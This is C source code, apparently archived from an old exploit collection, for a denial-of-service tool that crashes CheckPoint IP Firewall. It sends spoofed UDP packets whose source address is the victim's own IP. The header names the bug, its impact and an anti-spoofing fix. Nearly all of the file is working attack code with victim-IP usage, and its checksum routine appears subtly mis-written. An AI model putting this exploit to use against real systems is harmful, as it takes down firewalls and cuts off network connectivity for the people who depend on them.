home *** CD-ROM | disk | FTP | other *** search
- /*
- * CheckPoint IP Firewall Denial of Service Attack
- * July 2000
- *
- * Bug found by: antipent <rtodd@antipentium.com>
- * Code by: lore <fiddler@antisocial.com>
- *
- * [Intro]
- *
- * CheckPoint IP firewall crashes when it detects packets coming from
- * a different MAC with the same IP address as itself. We simply
- * send a few spoofed UDP packets to it, 100 or so should usually do
- * it.
- *
- * [Impact]
- *
- * Crashes the firewall and usually the box its running on. Resulting
- * in a complete stand still on the networks internet connectivity.
- *
- * [Solution]
- *
- * Turn on anti-spoofing, the firewall has an inbuilt function to do
- * this.
- *
- * [Disclaimer]
- *
- * Don't use this code. It's for educational purposes.
- *
- * [Example]
- *
- * ./cpd 1.2.3.4 500 53
- *
- * [Compile]
- *
- * cc -o cpd cpd.c
- *
- * [Support]
- *
- * This is designed to compile on Linux. I would port it, but you're
- * not meant to be running it anyway, right?
- *
- * -- lore
- */
-
- #define __BSD_SOURCE
-
- #include <stdio.h>
- #include <stdlib.h>
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <arpa/inet.h>
- #include <unistd.h>
- #include <netinet/ip.h>
- #include <netinet/ip_udp.h>
-
- #define TRUE 1
- #define FALSE 0
- #define ERR -1
-
- typedef u_long ip_t;
- typedef long sock_t;
- typedef struct ip iph_t;
- typedef struct udphdr udph_t;
- typedef u_short port_t;
-
- #define IP_SIZE (sizeof(iph_t))
- #define UDP_SIZE (sizeof(udph_t))
- #define PSIZE (IP_SIZE + UDP_SIZE)
- #define IP_OFF (0)
- #define UDP_OFF (IP_OFF + IP_SIZE)
-
- void usage __P ((u_char *));
- u_short checksum __P ((u_short *, int));
-
- int main (int argc, char * * argv)
- {
- ip_t victim;
- sock_t fd;
- iph_t * ip_ptr;
- udph_t * udp_ptr;
- u_char packet[PSIZE];
- u_char * yes = "1";
- struct sockaddr_in sa;
- port_t aport;
- u_long packets;
-
- if (argc < 3)
- {
- usage (argv[0]);
- }
-
- fprintf(stderr, "\n*** CheckPoint IP Firewall DoS\n");
- fprintf(stderr, "*** Bug discovered by: antipent <rtodd@antipentium.com>\n");
- fprintf(stderr, "*** Code by: lore <fiddler@antisocial.com>\n\n");
-
- if ((victim = inet_addr(argv[1])) == ERR)
- {
- fprintf(stderr, "Bad IP address '%s'\n", argv[1]);
- exit(EXIT_FAILURE);
- }
-
- else if (!(packets = atoi(argv[2])))
- {
- fprintf(stderr, "You should send at least 1 packet\n");
- exit(EXIT_FAILURE);
- }
-
- else if ((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == ERR)
- {
- fprintf(stderr, "Couldn't create raw socket: %s\n", strerror(errno));
- exit(EXIT_FAILURE);
- }
-
- else if ((setsockopt(fd, IPPROTO_IP, IP_HDRINCL, &yes, 1)) == ERR)
- {
- fprintf(stderr, "Couldn't set socket options: %s\n", strerror(errno));
- exit(EXIT_FAILURE);
- }
-
- srand((unsigned)time(NULL));
-
- if (argc > 3)
- {
- aport = htons(atoi(argv[3]));
- }
- else
- {
- aport = htons(rand() % 65535 + 1);
- }
-
- fprintf(stderr, "Sending packets: ");
-
- while (packets--)
- {
-
- memset(packet, 0, PSIZE);
-
- ip_ptr = (iph_t *)(packet + IP_OFF);
- udp_ptr = (udph_t *)(packet + UDP_OFF);
-
- ip_ptr->ip_hl = 5;
- ip_ptr->ip_v = 4;
- ip_ptr->ip_tos = 0;
- ip_ptr->ip_len = PSIZE;
- ip_ptr->ip_id = 1234;
- ip_ptr->ip_off = 0;
- ip_ptr->ip_ttl = 255;
- ip_ptr->ip_p = IPPROTO_UDP;
- ip_ptr->ip_sum = 0;
- ip_ptr->ip_src.s_addr = victim;
- ip_ptr->ip_dst.s_addr = victim;
-
- udp_ptr->source = htons(rand() % 65535 + 1);
- udp_ptr->dest = aport;
- udp_ptr->len = htons(UDP_SIZE);
- udp_ptr->check = checksum((u_short *)ip_ptr, PSIZE);
-
- sa.sin_port = htons(aport);
- sa.sin_family = AF_INET;
- sa.sin_addr.s_addr = victim;
-
- if ((sendto(fd,
- packet,
- PSIZE,
- 0,
- (struct sockaddr *)&sa,
- sizeof(struct sockaddr_in))) == ERR)
- {
- fprintf(stderr, "Couldn't send packet: %s\n",
- strerror(errno));
- close(fd);
- exit(EXIT_FAILURE);
- }
- fprintf(stderr, ".");
-
- }
-
- fprintf(stderr, "\n");
- close(fd);
-
- return (EXIT_SUCCESS);
- }
-
- void usage (u_char * pname)
- {
- fprintf(stderr, "Usage: %s <victim_ip> <packets> [port]\n", pname);
- exit(EXIT_SUCCESS);
- }
-
- u_short checksum (u_short *addr, int len)
- {
- register int nleft = len;
- register int sum = 0;
- u_short answer = 0;
-
- while (nleft > 1) {
- sum += *addr++;
- nleft -= 2;
- }
-
- if (nleft == 1) {
- *(u_char *)(&answer) = *(u_char *)addr;
- sum += answer;
- }
-
- sum = (sum >> 16) + (sum + 0xffff);
- sum += (sum >> 16);
- answer = ~sum;
- return(answer);
- }
-
- /* EOF */
-
-